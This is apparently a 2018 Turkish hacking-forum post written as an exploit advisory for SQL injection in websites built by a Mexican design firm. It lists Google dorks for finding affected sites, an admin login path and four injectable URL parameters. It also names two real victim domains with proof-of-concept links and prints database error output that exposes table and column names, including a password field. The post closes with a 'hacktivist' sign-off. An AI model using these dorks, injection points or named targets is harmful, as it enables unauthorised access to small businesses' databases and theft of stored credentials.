Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Designed by Logiprint Estratégica Mexico SQL Inj Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 91 / 100
Rep Sayısı: 2766
Mesaj Sayısı: 6323
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Designed by Logiprint Estratégica Mexico SQL Inj Vuln
14.09.2018 05:59
################################################################################​#################

# Exploit Title : Designed by Logiprint Estratégica Mexico SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 14/09/2018
# Vendor Homepage : logiprint.com.mx
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dork :

intext:''Designed by Logiprint Estratégica''

intext:''Copyright © 2016 Designed by Logiprint Estratégica''

# Admin Login Panel Path => /mi_cuenta/

# Exploit :

/shop-sidebar.php?idcategoria=[SQL Injection]

/shop-product-detail2.php?idproducto=&idcategoria=[SQL Injection]

/shop-product-detail2.php?idproducto=[ID-Number]&idpadre=&idcategoria=[SQL Injection]

/directorio.php?records_per_page=[ID-Number]&p=[ID-Number]&texto_buscar=&primer=[ID-Number]&segundo=[ID-Number]&tercer=[SQL Injection]

################################################################################​#################

# Example Sites =>

platoro.com.mx/shop-sidebar.php?idcategoria=8%27 => [ Proof of Concept ] => archive.is/6ZrBZ

galeriajoyera.com.mx/directorio.php?records_per_page=96&p=1&texto_buscar=&primer=5&segundo=2&tercer=24%27

=> [ Proof of Concept ] => archive.is/hIMNh

# SQL Database Errors =>

Error: [SELECT idcategorias, idpadre, nombreesp, nombreing, descripcion, imagen, orden, activo FROM logiprint_ultimascate
WHERE idcategorias=8' ORDER BY orden ASC]You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '' ORDER BY orden ASC' at line 1Error: [SELECT idbanner, imagenesp,
imagening, idcategorias, nombre, publicado FROM logiprint_banner WHERE idcategorias = ]
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '' at line 1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')
AND activo=1 ORDER BY local ASC' at line 1Error: [SELECT iddirectorio, nombrecomercial, logo, imgpublica, img1, img2, img3, idpiso,
local, idmetal, idcategorias, telefono, telefono1, telefonomovil, paginaweb, emailcontacto, Password, urlf, urlt, urlg, urli, urly, urlp, urlv, describ,
activo FROM logiprint_directorio WHERE iddirectorio IN(96,97,161) AND iddirectorio IN(3,6,8,10,16,25,30,33,47,53,55,56,81,88,90,91,92,
95,100,101,104,105,111,112,113,116,117,124,127,130,135,139,140,145,148,150,151,1​76,177,181,182) AND iddirectorio IN() AND activo=1
ORDER BY local ASC LIMIT 0, 96 ]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near ') AND activo=1 ORDER BY local ASC LIMIT 0, 96' at line 1

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti



1 Ziyaretçi